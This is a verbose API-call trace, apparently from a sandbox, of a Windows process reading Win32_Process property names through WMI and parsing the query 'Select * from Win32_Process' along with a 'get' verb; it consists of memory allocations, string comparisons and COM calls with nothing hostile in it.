[0563.168] IWbemClassObject:Get (in: This=0x368110, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaNonPagedPoolUsage", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPagedPoolUsage", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.168] free (_Block=0x189680)
[0563.168] malloc (_Size=0x18) returned 0x189680
[0563.168] IWbemClassObject:Get (in: This=0x368110, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaNonPagedPoolUsage", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPagedPoolUsage", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.168] free (_Block=0x189680)
[0563.168] malloc (_Size=0x18) returned 0x189680
[0563.168] lstrlenW (lpString="QuotaPagedPoolUsage") returned 19
[0563.169] lstrlenW (lpString="creationdate") returned 12
[0563.169] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="QuotaPagedPoolUsage", cchCount2=19) returned 1
[0563.169] free (_Block=0x189680)
[0563.169] IUnknown:Release (This=0x368110) returned 0x1
[0563.169] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.169] malloc (_Size=0x18) returned 0x189680
[0563.169] IWbemClassObject:Get (in: This=0x3683c0, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPagedPoolUsage", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPeakNonPagedPoolUsage", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.169] free (_Block=0x189680)
[0563.169] malloc (_Size=0x18) returned 0x189680
[0563.169] IWbemClassObject:Get (in: This=0x3683c0, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPagedPoolUsage", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPeakNonPagedPoolUsage", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.169] free (_Block=0x189680)
[0563.169] malloc (_Size=0x18) returned 0x189680
[0563.170] lstrlenW (lpString="QuotaPeakNonPagedPoolUsage") returned 26
[0563.170] lstrlenW (lpString="creationdate") returned 12
[0563.170] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="QuotaPeakNonPagedPoolUsage", cchCount2=26) returned 1
[0563.170] free (_Block=0x189680)
[0563.170] IUnknown:Release (This=0x3683c0) returned 0x1
[0563.170] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.170] malloc (_Size=0x18) returned 0x189680
[0563.170] IWbemClassObject:Get (in: This=0x368670, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPeakNonPagedPoolUsage", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPeakPagedPoolUsage", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.170] free (_Block=0x189680)
[0563.170] malloc (_Size=0x18) returned 0x189680
[0563.171] IWbemClassObject:Get (in: This=0x368670, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPeakNonPagedPoolUsage", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPeakPagedPoolUsage", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.171] free (_Block=0x189680)
[0563.171] malloc (_Size=0x18) returned 0x189680
[0563.171] lstrlenW (lpString="QuotaPeakPagedPoolUsage") returned 23
[0563.171] lstrlenW (lpString="creationdate") returned 12
[0563.171] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="QuotaPeakPagedPoolUsage", cchCount2=23) returned 1
[0563.171] free (_Block=0x189680)
[0563.171] IUnknown:Release (This=0x368670) returned 0x1
[0563.171] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.171] malloc (_Size=0x18) returned 0x189680
[0563.172] IWbemClassObject:Get (in: This=0x368920, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPeakPagedPoolUsage", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ReadOperationCount", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.172] free (_Block=0x189680)
[0563.172] malloc (_Size=0x18) returned 0x189680
[0563.172] IWbemClassObject:Get (in: This=0x368920, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPeakPagedPoolUsage", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ReadOperationCount", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.172] free (_Block=0x189680)
[0563.172] malloc (_Size=0x18) returned 0x189680
[0563.172] lstrlenW (lpString="ReadOperationCount") returned 18
[0563.172] lstrlenW (lpString="creationdate") returned 12
[0563.172] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="ReadOperationCount", cchCount2=18) returned 1
[0563.173] free (_Block=0x189680)
[0563.173] IUnknown:Release (This=0x368920) returned 0x1
[0563.173] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.173] malloc (_Size=0x18) returned 0x189680
[0563.173] IWbemClassObject:Get (in: This=0x368bd0, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ReadOperationCount", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ReadTransferCount", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.173] free (_Block=0x189680)
[0563.173] malloc (_Size=0x18) returned 0x189680
[0563.173] IWbemClassObject:Get (in: This=0x368bd0, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ReadOperationCount", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ReadTransferCount", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.173] free (_Block=0x189680)
[0563.173] malloc (_Size=0x18) returned 0x189680
[0563.174] lstrlenW (lpString="ReadTransferCount") returned 17
[0563.174] lstrlenW (lpString="creationdate") returned 12
[0563.174] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="ReadTransferCount", cchCount2=17) returned 1
[0563.174] free (_Block=0x189680)
[0563.174] IUnknown:Release (This=0x368bd0) returned 0x1
[0563.174] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.174] malloc (_Size=0x18) returned 0x189680
[0563.174] IWbemClassObject:Get (in: This=0x368e80, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ReadTransferCount", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="SessionId", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.174] free (_Block=0x189680)
[0563.174] malloc (_Size=0x18) returned 0x189680
[0563.174] IWbemClassObject:Get (in: This=0x368e80, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ReadTransferCount", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="SessionId", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.175] free (_Block=0x189680)
[0563.175] malloc (_Size=0x18) returned 0x189680
[0563.175] lstrlenW (lpString="SessionId") returned 9
[0563.175] lstrlenW (lpString="creationdate") returned 12
[0563.175] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="SessionId", cchCount2=9) returned 1
[0563.175] free (_Block=0x189680)
[0563.175] IUnknown:Release (This=0x368e80) returned 0x1
[0563.175] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.175] malloc (_Size=0x18) returned 0x189680
[0563.175] IWbemClassObject:Get (in: This=0x2c100b0, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="SessionId", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="Status", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.176] free (_Block=0x189680)
[0563.176] malloc (_Size=0x18) returned 0x189680
[0563.176] IWbemClassObject:Get (in: This=0x2c100b0, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="SessionId", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Status", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.176] free (_Block=0x189680)
[0563.176] malloc (_Size=0x18) returned 0x189680
[0563.176] lstrlenW (lpString="Status") returned 6
[0563.176] lstrlenW (lpString="creationdate") returned 12
[0563.176] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="Status", cchCount2=6) returned 1
[0563.176] free (_Block=0x189680)
[0563.176] IUnknown:Release (This=0x2c100b0) returned 0x1
[0563.176] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.176] malloc (_Size=0x18) returned 0x189680
[0563.177] IWbemClassObject:Get (in: This=0x2c10360, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="Status", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="TerminationDate", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.177] free (_Block=0x189680)
[0563.177] malloc (_Size=0x18) returned 0x189680
[0563.177] IWbemClassObject:Get (in: This=0x2c10360, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Status", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TerminationDate", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.177] free (_Block=0x189680)
[0563.177] malloc (_Size=0x18) returned 0x189680
[0563.177] lstrlenW (lpString="TerminationDate") returned 15
[0563.177] lstrlenW (lpString="creationdate") returned 12
[0563.177] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="TerminationDate", cchCount2=15) returned 1
[0563.178] free (_Block=0x189680)
[0563.178] IUnknown:Release (This=0x2c10360) returned 0x1
[0563.178] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.178] malloc (_Size=0x18) returned 0x189680
[0563.178] IWbemClassObject:Get (in: This=0x2c10610, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="TerminationDate", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ThreadCount", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.178] free (_Block=0x189680)
[0563.178] malloc (_Size=0x18) returned 0x189680
[0563.178] IWbemClassObject:Get (in: This=0x2c10610, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TerminationDate", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ThreadCount", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.178] free (_Block=0x189680)
[0563.178] malloc (_Size=0x18) returned 0x189680
[0563.178] lstrlenW (lpString="ThreadCount") returned 11
[0563.179] lstrlenW (lpString="creationdate") returned 12
[0563.179] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="ThreadCount", cchCount2=11) returned 1
[0563.179] free (_Block=0x189680)
[0563.179] IUnknown:Release (This=0x2c10610) returned 0x1
[0563.179] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.179] malloc (_Size=0x18) returned 0x189680
[0563.179] IWbemClassObject:Get (in: This=0x2c108c0, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ThreadCount", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="UserModeTime", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.179] free (_Block=0x189680)
[0563.179] malloc (_Size=0x18) returned 0x189680
[0563.179] IWbemClassObject:Get (in: This=0x2c108c0, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ThreadCount", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="UserModeTime", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.180] free (_Block=0x189680)
[0563.180] malloc (_Size=0x18) returned 0x189680
[0563.180] lstrlenW (lpString="UserModeTime") returned 12
[0563.180] lstrlenW (lpString="creationdate") returned 12
[0563.180] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="UserModeTime", cchCount2=12) returned 1
[0563.180] free (_Block=0x189680)
[0563.180] IUnknown:Release (This=0x2c108c0) returned 0x1
[0563.180] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.180] malloc (_Size=0x18) returned 0x189680
[0563.180] IWbemClassObject:Get (in: This=0x2c10b70, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="UserModeTime", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="VirtualSize", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.180] free (_Block=0x189680)
[0563.181] malloc (_Size=0x18) returned 0x189680
[0563.181] IWbemClassObject:Get (in: This=0x2c10b70, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="UserModeTime", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VirtualSize", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.181] free (_Block=0x189680)
[0563.181] malloc (_Size=0x18) returned 0x189680
[0563.181] lstrlenW (lpString="VirtualSize") returned 11
[0563.181] lstrlenW (lpString="creationdate") returned 12
[0563.181] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="VirtualSize", cchCount2=11) returned 1
[0563.181] free (_Block=0x189680)
[0563.181] IUnknown:Release (This=0x2c10b70) returned 0x1
[0563.181] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.182] malloc (_Size=0x18) returned 0x189680
[0563.182] IWbemClassObject:Get (in: This=0x2c10e20, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="VirtualSize", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="WindowsVersion", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.182] free (_Block=0x189680)
[0563.182] malloc (_Size=0x18) returned 0x189680
[0563.182] IWbemClassObject:Get (in: This=0x2c10e20, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VirtualSize", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WindowsVersion", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.183] free (_Block=0x189680)
[0563.183] malloc (_Size=0x18) returned 0x189680
[0563.183] lstrlenW (lpString="WindowsVersion") returned 14
[0563.184] lstrlenW (lpString="creationdate") returned 12
[0563.184] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="WindowsVersion", cchCount2=14) returned 1
[0563.184] free (_Block=0x189680)
[0563.184] IUnknown:Release (This=0x2c10e20) returned 0x1
[0563.184] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.184] malloc (_Size=0x18) returned 0x189680
[0563.184] IWbemClassObject:Get (in: This=0x2c110d0, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="WindowsVersion", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="WorkingSetSize", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.184] free (_Block=0x189680)
[0563.184] malloc (_Size=0x18) returned 0x189680
[0563.184] IWbemClassObject:Get (in: This=0x2c110d0, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WindowsVersion", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WorkingSetSize", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.185] free (_Block=0x189680)
[0563.185] malloc (_Size=0x18) returned 0x189680
[0563.185] lstrlenW (lpString="WorkingSetSize") returned 14
[0563.185] lstrlenW (lpString="creationdate") returned 12
[0563.185] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="WorkingSetSize", cchCount2=14) returned 1
[0563.185] free (_Block=0x189680)
[0563.185] IUnknown:Release (This=0x2c110d0) returned 0x1
[0563.185] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.185] malloc (_Size=0x18) returned 0x189680
[0563.185] IWbemClassObject:Get (in: This=0x2c11380, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="WorkingSetSize", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="WriteOperationCount", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.185] free (_Block=0x189680)
[0563.185] malloc (_Size=0x18) returned 0x189680
[0563.186] IWbemClassObject:Get (in: This=0x2c11380, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WorkingSetSize", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WriteOperationCount", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.186] free (_Block=0x189680)
[0563.186] malloc (_Size=0x18) returned 0x189680
[0563.186] lstrlenW (lpString="WriteOperationCount") returned 19
[0563.186] lstrlenW (lpString="creationdate") returned 12
[0563.186] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="WriteOperationCount", cchCount2=19) returned 1
[0563.186] free (_Block=0x189680)
[0563.186] IUnknown:Release (This=0x2c11380) returned 0x1
[0563.186] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.186] malloc (_Size=0x18) returned 0x189680
[0563.187] IWbemClassObject:Get (in: This=0x2c11630, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="WriteOperationCount", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="WriteTransferCount", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.187] free (_Block=0x189680)
[0563.187] malloc (_Size=0x18) returned 0x189680
[0563.187] IWbemClassObject:Get (in: This=0x2c11630, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WriteOperationCount", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WriteTransferCount", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.187] free (_Block=0x189680)
[0563.187] malloc (_Size=0x18) returned 0x189680
[0563.187] lstrlenW (lpString="WriteTransferCount") returned 18
[0563.187] lstrlenW (lpString="creationdate") returned 12
[0563.187] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="WriteTransferCount", cchCount2=18) returned 1
[0563.187] free (_Block=0x189680)
[0563.188] IUnknown:Release (This=0x2c11630) returned 0x1
[0563.188] IUnknown:Release (This=0x357630) returned 0x1
[0563.192] IUnknown:Release (This=0x320380) returned 0x0
[0563.192] free (_Block=0x189660)
[0563.192] ??1CHString@@QEAA@XZ () returned 0x7fef5b8c96c
[0563.192] free (_Block=0x18ce80)
[0563.192] malloc (_Size=0x70) returned 0x18ce80
[0563.192] malloc (_Size=0x8) returned 0x18cf00
[0563.192] malloc (_Size=0x18) returned 0x189660
[0563.192] SysStringLen (param_1="creationdate") returned 0xc
[0563.192] malloc (_Size=0x1a) returned 0x18cf20
[0563.193] SysStringLen (param_1="creationdate") returned 0xc
[0563.193] malloc (_Size=0x8) returned 0x18cf50
[0563.193] free (_Block=0x189660)
[0563.193] free (_Block=0x18ce30)
[0563.193] lstrlenW (lpString="creationdate") returned 12
[0563.193] malloc (_Size=0x1a) returned 0x18ce30
[0563.193] lstrlenW (lpString="creationdate") returned 12
[0563.193] free (_Block=0x18cf20)
[0563.193] free (_Block=0x18cf50)
[0563.193] free (_Block=0x18cf00)
[0563.194] free (_Block=0x18ce80)
[0563.194] lstrlenW (lpString="Select * from Win32_Process") returned 27
[0563.194] malloc (_Size=0x38) returned 0x1886c0
[0563.194] lstrlenW (lpString="Select * from Win32_Process") returned 27
[0563.194] wcstok (in: _String="Select * from Win32_Process", _Delimiter=" ", _Context=0xffffffffffffff80 | out: _String="Select", _Context=0xffffffffffffff80) returned="Select"
[0563.194] malloc (_Size=0x18) returned 0x189660
[0563.194] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned="*"
[0563.194] lstrlenW (lpString="FROM") returned 4
[0563.194] lstrlenW (lpString="*") returned 1
[0563.194] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1
[0563.195] malloc (_Size=0x18) returned 0x189680
[0563.195] free (_Block=0x189660)
[0563.195] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x200101006e0009 | out: _String=0x0, _Context=0x200101006e0009) returned="from"
[0563.195] lstrlenW (lpString="FROM") returned 4
[0563.195] lstrlenW (lpString="from") returned 4
[0563.195] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2
[0563.195] malloc (_Size=0x18) returned 0x189660
[0563.195] free (_Block=0x189680)
[0563.195] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x200102006e0009 | out: _String=0x0, _Context=0x200102006e0009) returned="Win32_Process"
[0563.195] malloc (_Size=0x18) returned 0x189680
[0563.196] free (_Block=0x189660)
[0563.196] free (_Block=0x1886c0)
[0563.196] free (_Block=0x189680)
[0563.196] lstrlenW (lpString="SET") returned 3
[0563.196] lstrlenW (lpString="get") returned 3
[0563.196] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="SET", cchCount2=3) returned 1
[0563.196] lstrlenW (lpString="CREATE") returned 6
[0563.196] lstrlenW (lpString="get") returned 3
[0563.196] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="CREATE", cchCount2=6) returned 3
[0563.197] free (_Block=0x18cce0)
[0563.197] malloc (_Size=0x8) returned 0x18cce0
[0563.197] lstrlenW (lpString="GET") returned 3
[0563.197] lstrlenW (lpString="get") returned 3
[0563.197] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="GET", cchCount2=3) returned 2
[0563.197] free (_Block=0x1895a0)
[0563.197] malloc (_Size=0x18) returned 0x1895a0
[0563.198] free (_Block=0x189580)
[0563.198] malloc (_Size=0x18) returned 0x189580
[0563.199] ??0CHString@@QEAA@XZ () returned 0xaf7a8
[0563.199] malloc (_Size=0x18) returned 0x189680
[0563.199] malloc (_Size=0x20) returned 0x18ce80
[0563.199] memcpy_s (in: _Destination=0x18ce80, _DestinationSize=0x1e, _Source=0x31edc8, _SourceSize=0x14 | out: _Destination=0x18ce80) returned 0x0
[0563.199] lstrlenW (lpString="&") returned 1
[0563.199] lstrlenW (lpString="&") returned 5
[0563.199] lstrlenW (lpString="<") returned 1
[0563.199] lstrlenW (lpString="<") returned 4
[0563.199] lstrlenW (lpString=">") returned 1
[0563.199] lstrlenW (lpString=">") returned 4
[0563.199] lstrlenW (lpString="'") returned 1
[0563.199] lstrlenW (lpString="'") returned 6
[0563.199] lstrlenW (lpString="\"") returned 1
[0563.199] lstrlenW (lpString=""") returned 6
[0563.199] malloc (_Size=0x18) returned 0x189660
[0563.200] free (_Block=0x189680)
[0563.200] free (_Block=0x18ce80)
[0563.200] ?Format@CHString@@QEAAXPEBGZZ () returned 0x18ce8c
[0563.200] malloc (_Size=0x18) returned 0x189680
